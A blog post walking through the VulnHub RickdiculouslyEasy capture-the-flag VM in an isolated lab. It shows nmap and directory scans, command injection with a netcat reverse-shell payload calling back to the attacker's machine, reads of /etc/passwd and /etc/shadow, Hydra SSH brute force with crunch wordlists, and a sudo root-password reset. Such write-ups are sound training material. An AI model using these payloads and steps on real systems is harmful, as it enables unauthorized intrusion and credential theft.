As mentioned in my previous article, I participated in a CTF competition. Part of that CTF competition included OSINT (Open-Source Intelligence) and penetration testing exercises. Today, I want to discuss penetration testing 101 in a CTF environment.
This post contains affiliate links. If you use these links to buy something I may earn a commission. Full disclosure here.
Pre-engagement
Pentesting in the real world starts with the pre-engagement phase. This phase involves engaging with the client to find out their goals, scope of work, etc. It’s different in a CTF environment. Some CTF will give you the rules of engagement and possibly a topology. Others might not provide anything, and it’s up to you to figure it all out.
Know thy enemy
Reconnaissance plays a vital role in successful penetration testing. Without a solid reconnaissance, there is a high chance of failure to complete the pentest or may take longer than expected. The goal of reconnaissance is to gather information for possible entry points to the target system(s).
The definition of the reconnaissance phase will vary depending on where you get your information. In Cisco’s CCNP SCOR on-demand course, this phase does include both passive and active reconnaissance.
In passive reconnaissance, the attacker’s focus is to gather information about the target without engaging actively. It means the attacker is gathering information by using their favorite search engine, Shodan, whois information, etc.
In active reconnaissance, the attacker is actively interacting with the target(s). Attackers typically perform port scans, ping sweeps, vulnerability scanning, etc. This method of reconnaissance is actively interacting with the target(s), which means there’s a trail of the attack.
Exploiting vulnerabilities
Once you’ve identified the target system(s) and vulnerabilities, you are now ready to perform your attacks. The attacks will consist of web application attacks, network-based attacks, etc.
There are many tools available that you can use, such as Metasploit, Hydra, password cracking tools, etc. In a lot of cases, you are going to use a combination of tools to gain access.
Documentation and reporting
I haven’t heard or participated in any CTF event where documentation and reporting are required. In the real world, the pentesting report and remediation plans are vital to the client. They may use it for compliance and improve their defenses.
A pentester in the real world will need to hone their documentation and presentation skills to communicate their findings and remediation plans. A CTF player won’t need to write any reports. The main objective is to capture the flag.
CTF walkthrough
The best way to learn is by example. That said, I suggest you download the same VM that I’m attacking so you can follow along. The VM I’m using for this demo is called RickdiculouslyEasy from VulnHub.
Note
I do not trust any of the VMs there. That said, I put them on a separate vSwitch with no hardware attached to it, which means no connectivity to my home network. I recommend you do something similar.
In the CTF competition that I participated in, there were few targets. Since we had a diagram, we knew the IP addresses of the targets. However, I still performed the ping sweep to find out if they are responding. There are two tools that I use for this task: Nmap and fping. Though, I tend to use the latter for this purpose.
Nmap
I think the base install of Kali Linux includes Nmap. If not, it’s easy to install it by issuing sudo apt install nmap -y
syntax. Once installed, enter the syntax below in the terminal to perform a ping sweep for the whole 172.16.20.0/24 subnet.
andrew@kali:~$ nmap -sn 172.16.20.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 19:48 PST Nmap scan report for 172.16.20.1 Host is up (0.00029s latency). Nmap scan report for 172.16.20.50 Host is up (0.00054s latency). Nmap scan report for 172.16.20.51 Host is up (0.00025s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 15.63 seconds
The -sn
command flag essentially disables port scan. There are many command flags available, so hit the man page and read it. Alternatively, you can buy the Nmap book or read it online for free.
fping
I came across this tool long before I knew how to use Nmap. That said, I tend to use this a lot more for ping sweep than Nmap. It is not in the default Kali Linux installation, so you have to add it. To install, issue the sudo apt install fping -y
syntax. To perform a ping sweep for the same subnet as above, issue the syntax below.
andrew@kali:~$ fping -ga 172.16.20.0/24 172.16.20.1 172.16.20.50 172.16.20.51 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2 ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2 < -- Output omitted for brevity -- >
Let’s break down the command for those who are unfamiliar with the tool. The -g
means that I want to either specify a start and end IP target list or a target subnet. The -a
means to show only the targets that are alive.
andrew@kali:~$ fping -ga 172.16.20.0/24 2> /dev/null 172.16.20.1 172.16.20.50 172.16.20.51
Depending on the version installed, the unreachable messages may not show up. Newer versions include the unreachable messages, so I tend to add the 2> /dev/null
syntax to remove from the output, as shown in the second one.
Services running
Once you have a list of IP addresses, it’s time to find out the services they are running for a possible entry point(s). The well-known tool for this job is Nmap.
sudo nmap -A -T5 172.16.20.50 -p 1-65535
andrew@kali:~$ sudo nmap -A -T5 172.16.20.50 -p 1-65535 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 20:04 PST Nmap scan report for 172.16.20.50 Host is up (0.00023s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt |drwxr-xr-x 2 0 0 6 Feb 12 2017 pub | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:172.16.20.51 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh? | fingerprint-strings: | NULL: | Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64) |ssh-hostkey: ERROR: Script execution failed (use -d to debug) 80/tcp open http Apache httpd 2.4.27 ((Fedora)) | http-methods: | Potentially risky methods: TRACE |http-server-header: Apache/2.4.27 (Fedora) |_http-title: Morty's Website 9090/tcp open http Cockpit web service 161 or earlier |_http-title: Did not follow redirect to https://172.16.20.50:9090/ 13337/tcp open unknown | fingerprint-strings: | NULL: | FLAG:{TheyFoundMyBackDoorMorty}-10Points 22222/tcp open ssh OpenSSH 7.5 (protocol 2.0) | ssh-hostkey: | 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA) | 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA) |_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519) 60000/tcp open unknown | fingerprint-strings: | NULL, ibm-db2: |_ Welcome to Ricks half baked reverse shell… 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port22-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r(NUL SF:L,42,"Welcome\x20to\x20Ubuntu\x2014.04.5\x20LTS\x20(GNU/Linux\x204. SF:4.0-31-generic\x20x86_64)\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port13337-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r( SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port60000-TCP:V=7.91%I=7%D=11/23%Time=5FBC8668%P=x86_64-pc-linux-gnu%r( SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell.\ SF:..\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r SF:everse\x20shell...\n#\x20"); MAC Address: 00:0C:29:34:CE:AA (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.23 ms 172.16.20.50 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 56.92 seconds
If you are following along, you should see similar or the same output as mine. As you can see, we’ve successfully determined the open ports and some information about the services that are running. Additionally, we found some flags.
Flag #1 – 10 Points
TheyFoundMyBackDoorMorty
Let’s break down the Nmap syntax. The -A
flag will attempt to detect OS and service version, script scanning, and traceroute. The -T5
flag speeds up the process of scanning. The -p 1-65535
indicates that you want to perform a scan from ports 1 to 65535.
Note
In the real world, you wouldn’t want to use -T5
flag. It’s aggressive and may trigger IDS/IPS/NGFW to block your host. I’ve also heard that it can crash either the service or server. Also, you may not want to run script scanning if the client specifically asked for vulnerability assessment.
FTP – Port 21
From our Nmap scan result, the built-in script scanning was able to identify that the server is running anonymous FTP. On top of that, it performed a directory listing, which revealed that it contains a flag.
To get the flag, I used the curl
command. Alternatively, you can use an FTP client, download and view the file.
andrew@kali:~$ curl ftp://anonymous@172.16.20.50/FLAG.txt FLAG{Whoa this is unexpected} - 10 Points
Flag #2 – 10 Points
Whoa this is unexpected
Port 22
As many IT professionals know, port 22 is the default port for the SSH service. However, our Nmap scan result couldn’t identify it as such. That said, it’s safe to assume it’s not running SSH service. We can always verify that.
andrew@kali:~$ nc 172.16.20.50. 22 Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64) whoami ^C
Nothing happened when we issued a command, so we probably should move on.
HTTP – Port 80
From our Nmap scan result, we can tell that it is indeed running a web server. You can use Firefox for this task or use curl. For this purpose, I used the curl syntax below.
curl 172.16.20.50
andrew@kali:~$ curl 172.16.20.50 <!DOCTYPE html> <html> <head> <title>Morty's Website</title> <center><font size="20" color="yellow"><b>MORTY'S COOL WEBSITE</b></font></center> <center><font size = "5" color="yellow">It's not finished yet ok. Stop judging me.</font></center> <style> body { background-image: url("morty.png"); } </style> </head> </html>
There’s no flag showing up as text, so it might be worth skipping this for now. While some CTF challenges will hide the flag using steganography tools, we don’t want to analyze the morty.png
file for now. We can always come back to that later since we’re not done with our reconnaissance just yet.
Directory scanning
One of the things I learned from a penetration testing course, which I have yet to finish, was web directory scanning. Kali Linux should have two tools installed, which are dirb
(CLI) and dirbuster
(GUI).
andrew@kali:~$ dirb http://172.16.20.50/ <-- Output omitted for brevity --> ---- Scanning URL: http://172.16.20.50/ ---- + http://172.16.20.50/cgi-bin/ (CODE:403|SIZE:217) + http://172.16.20.50/index.html (CODE:200|SIZE:326) ==> DIRECTORY: http://172.16.20.50/passwords/ + http://172.16.20.50/robots.txt (CODE:200|SIZE:126) ---- Entering directory: http://172.16.20.50/passwords/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Nov 25 06:13:09 2020 DOWNLOADED: 4612 - FOUND: 3
Another tool that you can use is gobuster
, which you need to install manually.
andrew@kali:~$ sudo apt install gobuster -y <-- Output omitted for brevity --> andrew@kali:~$ gobuster dir -u http://172.16.20.50 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt <-- Output omitted for brevity --> /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /cgi-bin/ (Status: 403) /index.html (Status: 200) /passwords (Status: 301) /robots.txt (Status: 200) =============================================================== 2020/11/24 20:02:45 Finished ===============================================================
For this scenario, it doesn’t matter which one you use. Both tools discovered files and directories that are useful for finding the flags. For example, both of them found a password directory. Let’s look in there to see what’s in it.
curl http://172.16.20.50/passwords/
andrew@kali:~$ curl http://172.16.20.50/passwords/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /passwords</title> </head> <body> <h1>Index of /passwords</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr> <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="FLAG.txt">FLAG.txt</a> </td><td align="right">2017-08-22 02:31 </td><td align="right"> 44 </td><td> </td></tr> <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="passwords.html">passwords.html</a> </td><td align="right">2017-08-23 19:51 </td><td align="right">352 </td><td> </td></tr> <tr><th colspan="5"><hr></th></tr> </table> </body></html>
We found another flag. Let’s use the curl
command again to display the flag.
andrew@kali:~$ curl http://172.16.20.50/passwords/FLAG.txt FLAG{Yeah d- just don't do it.} - 10 Points
Flag #3 – 10 Points
Yeah d- just don’t do it.
We still have an interesting password.html
file, so let’s take a look at that. Again, let’s use curl
to display the HTML file.
andrew@kali:~$ curl http://172.16.20.50/passwords/passwords.html <!DOCTYPE html> <html> <head> <title>Morty's Website</title> <body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body> <!--Password: winter--> </head> </html>
It seems like we found a password, but we don’t have a username just yet. Let’s put that in our back pocket and come back to it later when we find at least a username.
We know that we have a cgi-bin
directory, but we don’t know what’s in it. So, let’s move on to the robots.txt
file.
andrew@kali:~$ curl http://172.16.20.50/robots.txt They're Robots Morty! It's ok to shoot them! They're just Robots! /cgi-bin/root_shell.cgi /cgi-bin/tracertool.cgi /cgi-bin/*
Finally, we found the scripts or applications in the cgi-bin
folder. Let’s check what’s in it.
andrew@kali:~$ curl http://172.16.20.50/cgi-bin/root_shell.cgi <html><head><title>Root Shell </title></head> --UNDER CONSTRUCTION-- <!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG--> <!--I'm sorry Morty. It's a bummer.--> </html> andrew@kali:~$ curl http://172.16.20.50/cgi-bin/tracertool.cgi <html><head><title>Super Cool Webpage </title></head> <b>MORTY'S MACHINE TRACER MACHINE</b> <br>Enter an IP address to trace.</br> <form action=/cgi-bin/tracertool.cgi method="GET"> <textarea name="ip" cols=40 rows=4> </textarea> <input type="submit" value="Trace!"> </form>
The root_shell.cgi
is a dead end, so we’ll concentrate on the tracertool.cgi
page.
Command Injection
When you visit the URL, you will see a simple web application that performs a traceroute to the IP address that you entered. I’m familiar with the injection attack because of the security-related courses I’ve taken.

From an attacker’s perspective, any input form is an attack opportunity. That said, we’re going to attempt to launch a command injection attack. Essentially, we’re just adding a syntax at the end of the expected input.

Let’s try to eliminate the first half of our request to see what happens.

If you’re following along, you will notice that it takes a bit of time for the app to process our input. Not ideal when you’re in a time-bounded CTF. We can choose to continue using this web app, or we can attempt to establish a reverse shell.
Reverse Shell
There are many ways to establish a reverse shell. In this instance, let’s use a familiar tool that we used earlier, and that is Netcat.
For this to work, the attacker must set up a listener port. The listener port will accept the connection from the victim’s machine.
To set up a listener port on our Kali Linux instance, issue the nc -lvp 53
syntax. You should see something similar, as shown below.
andrew@kali:~$ nc -lvp 53 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::53 Ncat: Listening on 0.0.0.0:53
The -l
will listen for incoming connections. The -v
sets it to verbose mode. The -p
specifies the source port to use.
On Morty’s Super Cool Webpage, enter ; nc 172.16.20.52 53 -e /bin/bash
syntax.

After the nc
, you need to enter an IP address and the port that matches your Kali Linux machine. The -e
will execute the given command. In this case, we want /bin/bash
to run.
You should notice on your Kali Linux machine that the reverse shell connection was successful.
andrew@kali:~$ nc -lvp 53 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::53 Ncat: Listening on 0.0.0.0:53 Ncat: Connection from 172.16.20.50. Ncat: Connection from 172.16.20.50:47182. whoami apache
This shell, however, it’s not fully interactive. We can attempt to upgrade it to a fully interactive one by issuing the command, as shown below.
python -c 'import pty.spawn("/bin/bash")'
In this case, nothing happened. You can attempt other ways to get an interactive shell, but in this instance, I’m going to skip it.
Searching for usernames
Let’s view the contents of /etc/passwd
and /etc/shadow
since we need some usernames and password hash.
cat /etc/passwd;cat /etc/shadow _ | \ | | | | |\ | | /, ~\ / / X `-.....-------./ / ~-. ~ ~ | \ / | \ /_ ___\ / | /\ ~~~~~ \ | | | \ || | | |\ \ || ) (_/ (_/ ((_/ <-- Output omitted for brevity -->
Pretty ASCII art! It looks like the cat
command isn’t working. Let’s try a different command to view the contents of both files.
The head
command is a command used to display the first part of a file. Let’s use that utility to see if we can view the content of both files.
head -n 100 /etc/passwd | grep -v nologin ; head -n 100 /etc/shadow root:x:0:0:root:/root:/bin/bash sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash Morty:x:1001:1001::/home/Morty:/bin/bash Summer:x:1002:1002::/home/Summer:/bin/bash
Let’s break down the first part of the syntax that I issued. The -n 100
specifies that I want to show only the first 100 lines of the file. The grep -v nologin
means that I don’t want to see any lines with nologin. The semi-colon allows us to execute a series of commands in a single prompt.
We didn’t see anything for /etc/shadow
, so we might not have the privileges to view the file. That’s okay since we seem to have a password that we found earlier.
SSH – Port 22222
We now have usernames and possibly a password for one of the users. Let’s launch an SSH brute force attack. There are two ways of doing this using Hydra. Manually, typing each username and same password or creating a username list. I opted for the latter.
Since I opted for a username list, I created a text file in my home directory.
andrew@kali:~$ cat user.txt root RickSanchez Morty Summer
Now, I’m ready to launch an SSH brute force attack using Hydra.
andrew@kali:~$ hydra -L user.txt -p winter ssh://172.16.20.50:22222 <-- Output omitted for brevity --> [22222][ssh] host: 172.16.20.50 login: Summer password: winter 1 of 1 target successfully completed, 1 valid password found <-- Output omitted for brevity -->
Our SSH brute force attack was successful! We can use Summer’s account to SSH to our target machine.
Note
The password is in the RockYou wordlist. We could’ve used that wordlist for our brute force attack. However, this is faster.
Before we move on, let’s break down the syntax that I used. The -L
means that you want to use a wordlist. The -p
means that you want to use winter
against our user list.
andrew@kali:~$ ssh Summer@172.16.20.50 -p 22222 Summer@172.16.20.50's password: There was 1 failed login attempt since the last successful login. Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
Let’s see what files does she have in her home directory.
[Summer@localhost ~]$ ls -l total 4 -rw-rw-r--. 1 Summer Summer 48 Aug 22 2017 FLAG.txt
We found another flag! Let’s see what the flag is.
[Summer@localhost ~]$ head -n 100 FLAG.txt FLAG{Get off the high road Summer!} - 10 Points
Flag #4 – 10 Points
Get off the high road Summer!
Poking around
Let’s keep poking around to see what else we can do with our access. The idea here is to get more flags and root access.
[Summer@localhost ~]$ ls -l /etc/shadow ; ls -l /home/root ; ls -l /home/Morty; ls -l /home/RickSanchez ----------. 1 root root 1205 Aug 23 2017 /etc/shadow ls: cannot access '/home/root': No such file or directory total 48 -rw-r--r--. 1 root root 414 Aug 22 2017 journal.txt.zip -rw-r--r--. 1 root root 43145 Aug 22 2017 Safe_Password.jpg total 0 drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 2017 RICKS_SAFE drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18 2017 ThisDoesntContainAnyFlags
We can’t perform password cracking since we don’t have access to the shadow file. But, we have some access to files and directories to get more clues.
Let’s start with Morty’s JPEG and ZIP files.
[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip Archive: /home/Morty/journal.txt.zip [/home/Morty/journal.txt.zip] journal.txt password: skipping: journal.txt incorrect password
We need a password for the ZIP file. I don’t have a password aside from winter
, so we need to look for some more clues.
Since we found an image, let’s see what we can do with the JPEG file. One of the things I learned during our internal CTF is steganography analysis. That said, we need to analyze the image file.
Steganography
The strings
command is one of the tools I learned when performing steganography analysis. Let’s try that out and see.
[Summer@localhost ~]$ strings -n 20 /home/Morty/Safe_Password.jpg -bash: strings: command not found
The command is not available on this machine. Let’s transfer it to our Kali Linux machine to analyze the file.
andrew@kali:~$ scp -P 22222 Summer@172.16.20.50:/home/Morty/Safe_Password.jpg . Summer@172.16.20.50's password: Safe_Password.jpg 100% 42KB 9.0MB/s 00:00
Now, we’re not limited to the target machine’s installed packages. Let’s go ahead and issue the same command we used earlier.
andrew@kali:~$ strings -n 20 Safe_Password.jpg 8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
It seems that we found the ZIP file’s password. The -n
command flag specifies the minimum string length to display.
Now, let’s unzip the file using the password we just found.
[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip Archive: /home/Morty/journal.txt.zip [/home/Morty/journal.txt.zip] journal.txt password: inflating: journal.txt
As suspected, it worked. Now, let’s see what’s in it.
[Summer@localhost ~]$ head -n 100 journal.txt Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is: FLAG: {131333} - 20 Points
We found another flag! At this point, we’re at 60 points.
Flag #5 – 20 Points
131333
Poking around some more
At this point, we can now move on to RickSanchez’s files. Let’s look at the first directory called RICKS_SAFE
.
[Summer@localhost ~]$ ls -l /home/RickSanchez/RICKS_SAFE/ total 12 -rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21 2017 safe
It seems that the file is an executable, and we don’t have the privilege to run it. Let’s copy the file to Summer’s home directory and run it from there.
[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe . [Summer@localhost ~]$ chmod 777 safe [Summer@localhost ~]$ ./safe Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
It’s talking about command line arguments, so we need to add something at the end for the executable to run correctly. If we go back and read Morty’s journal entry, it’s talking about Rick’s safe or password. Let’s try it out.
[Summer@localhost ~]$ ./safe 131333 decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points Ricks password hints: (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.) Follow these clues, in order 1 uppercase character 1 digit One of the words in my old bands name.� @
We found another flag, and it’s giving us a hint to get Rick’s password. It’s also talking about sudo
, so that maybe our way to get root access.
Flag #6 – 20 Points
And Awwwaaaaayyyy we Go!
Generating wordlist
I’ve always used a RockYou and other wordlists but never generated a custom one. With that said, I had to use a search engine on how to perform this task. I found out that crunch
is one of them.
We’ll use this command line tool to generate wordlists based on the clue. According to the clue, we need at least one uppercase letter, one digit, and one of the words in Rick’s old band’s name. I’ve never watched Rick & Morty show, so I had to use a search engine again. I found out that the name of the band is The Flesh Curtains.
I read a bit of crunch
‘s man page and other tutorials on the web. From my understanding, we need to use -t ,%
for the first part of the password and add the band’s name separately.
andrew@kali:~$ crunch 5 5 -t ,%The > the.txt <-- Output omitted for brevity --> Crunch will now generate the following number of lines: 260 andrew@kali:~$ crunch 7 7 -t ,%Flesh > flesh.txt <-- Output omitted for brevity --> Crunch will now generate the following number of lines: 260 andrew@kali:~$ crunch 10 10 -t ,%Curtains > curtains.txt <-- Output omitted for brevity --> Crunch will now generate the following number of lines: 260
The first and second values after crunch are the minimum and maximum length of the password. The -t ,%
specifies that we want an upper case character and digit for the first two characters of the password before The
. That means the first password in our list will be A0The, and the last is Z9The.
Another SSH brute force attack
Now that we have the wordlists, we’re ready to launch another brute force attack against Rick’s account. Same as above, we’re going to use Hydra to perform this task for us.
andrew@kali:~$ hydra -l RickSanchez -P the.txt ssh://172.16.20.50:22222 -t 64 <-- Output omitted for brevity --> 1 of 1 target completed, 0 valid password found andrew@kali:~$ hydra -l RickSanchez -P flesh.txt ssh://172.16.20.50:22222 -t 64 <-- Output omitted for brevity --> 1 of 1 target completed, 0 valid password found andrew@kali:~$ hydra -l RickSanchez -P curtains.txt ssh://172.16.20.50:22222 -t 64 <-- Output omitted for brevity --> [22222][ssh] host: 172.16.20.50 login: RickSanchez password: P7Curtains 1 of 1 target successfully completed, 1 valid password found
We successfully found the password for RickSanchez’s account. Let’s log into the machine and see if this account is one of the sudoers.
andrew@kali:~$ ssh RickSanchez@172.16.20.50 -p 22222 RickSanchez@172.16.20.50's password: Last login: Thu Sep 21 09:45:24 2017 [RickSanchez@localhost ~]$ sudo echo "root:password" | sudo chpasswd [sudo] password for RickSanchez: [RickSanchez@localhost ~]$
It took the command! Let’s verify that we can log in using the root account.
andrew@kali:~$ ssh root@172.16.20.50 -p 22222 root@172.16.20.50's password: Last login: Fri Sep 15 11:44:15 2017
We’ve successfully rooted the box! While we’ve gained access to the root account, we still need to find more flags. Let’s see what we can find in the root’s directory.
[root@localhost ~]# ls -l total 8 -rw-------. 1 root root 1214 Aug 18 2017 anaconda-ks.cfg -rw-r--r--. 1 root root 40 Aug 22 2017 FLAG.txt
We found another flag! Let’s take a look.
[root@localhost ~]# head FLAG.txt FLAG: {Ionic Defibrillator} - 30 points
At this point, we’re at 110 points. We’re 20 more points away from the finish line.
Flag #7 – 30 Points
Ionic Defibrillator
HTTPS – Port 9090
Since we have two more ports that we haven’t tried, let’s move on to those and see if we can find any more flags. The Nmap scan that we performed earlier detected that port 9090 is HTTPS.
andrew@kali:~$ curl -k https://172.16.20.50:9090 | grep FLAG % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 <div id="brand">FLAG <b>{There is no Zeus, in your face!} - 10 Points</b></div><!--/#brand--> 100 41766 0 41766 0 0 4078k 0 --:--:-- --:--:-- --:--:-- 4078k
We found another flag. At this point, we just need one more and we’re done.
Flag #8 – 10 Points
There is no Zeus, in your face!
We have two options from here: perform directory scanning or move on to the next port. Let’s opt for the latter and come back if that’s a dead end.
Port 60000
Since our Nmap scan didn’t recognize what protocol this port is running, we’ll use Netcat to connect to it.
andrew@kali:~$ nc 172.16.20.50 60000 Welcome to Ricks half baked reverse shell... # ls FLAG.txt # head FLAG.txt FLAG{Flip the pickle Morty!} - 10 Points
We’ve finally managed to capture the last flag. Now, we’ve completed this CTF challenge.
Flag #9 – 10 Points
Flip the pickle Morty!
Final Thoughts
While CTFs provide learning opportunities, participants are hacking deliberately vulnerable systems. In the real world, when companies pay for penetration testing services, they tend to have a security team that keeps their systems secure.
Don’t get me wrong, CTF is a great way to learn offensive security skills, so don’t let that discourage you. Some of the tools that CTF players use are the same ones used in the real world. But, you must understand that penetration testing in the real world is different and a serious business.
If you are interested in becoming a pentester, make sure to understand the difference between CTF and pentesting. I stumbled upon this book that I want to read eventually.
You might like to read
BUY ME COFFEE ☕
Disclosure
AndrewRoderos.com is a participant of a few referral programs, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to company websites.